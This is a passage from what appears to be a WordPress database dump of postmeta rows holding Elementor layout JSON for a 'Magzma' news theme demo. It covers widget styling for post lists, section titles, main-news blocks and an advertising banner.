"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"19\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"},{\"id\":\"ddyguyh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"Recent Post\",\"title_size\":\"h6\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#000000\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"cgofvkr\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list_3_post_setting\":\"\",\"posts_per_page\":\"6\",\"offset\":\"\",\"category\":[],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-3\",\"section_magzma_post_control\":\"\",\"vertical_position\":{\"unit\":\"px\",\"size\":0},\"vertical_position_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_mobile\":{\"unit\":\"px\",\"size\":0},\"hide_image\":\"on\",\"width\":\"300\",\"height\":\"200\",\"use_icon\":\"\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":10},\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"title_font_weight\":\"700\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_category\":\"on\",\"typhography_category_color\":\"#000000\",\"category_title_hov_color\":\"#000000\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":12},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"category_font_weight\":\"700\",\"category_font_weight_tablet\":\"600\",\"category_font_weight_mobile\":\"600\",\"use_date\":\"on\",\"typhography_date_color\":\"#777777\",\"date_title_hov_color\":\"#777777\",\"date_line_height\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"date_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"date_font_size\":{\"unit\":\"px\",\"size\":12},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"20\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-3\"},{\"id\":\"4ot2x74\",\"elType\":\"widget\",\"settings\":{\"section_magzma_advertising\":\"\",\"advertising_type\":\"image_and_url\",\"image\":{\"url\":\"http:\\/\\/demo7.magzma.com\\/wp-content\\/uploads\\/sites\\/8\\/2017\\/01\\/banner-main-news380x600.jpg\",\"id\":334},\"image_ad_size\":\"full\",\"link_to\":\"none\",\"link\":{\"is_external\":\"\",\"url\":\"\"},\"ad_script\":\"\",\"sticky_ads\":\"no\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-advertising-builder\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(478,357,'_elementor_version','0.4'),(484,359,'_wp_page_template','default'),(485,360,'_wp_page_template','default'),(486,360,'use_wrapper_space','1'),(487,360,'_use_wrapper_space','field_5858a5302ab1a'),(488,360,'hide_title','1'),(489,360,'_hide_title','field_5629b0afab2ef'),(490,360,'_elementor_edit_mode','builder'),(491,360,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd